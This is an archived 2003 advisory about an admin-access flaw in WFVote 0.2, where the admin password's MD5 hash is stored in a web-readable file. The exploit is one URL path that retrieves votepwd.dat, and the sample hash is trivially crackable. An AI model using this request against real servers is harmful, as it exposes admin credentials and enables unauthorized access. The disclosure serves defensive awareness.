logo Home

Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

WFVote Admin access
Date: 2003-03-22

Author : subj - r2subj3ct@dwclan.org

Product : WFVote
Version : 0.2
WebSite : http://jid.2yd.ru
Problem : Admin access

[rus]

Description:
------------

setadmpw.php
=========
[...]

myflock();
$f=fopen("votepwd.dat","w");
fputs($f,md5($admpwd1));
fclose($f);
myfunlock();

[...]
=========

votepwd.dat
=======

21232f297a57a5a743894a0e4a801fc3

=======

#
password is encrypted by MD5 algorithm
#

Exploit:
--------

http://[somehost]/vote/votepwd.dat



 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy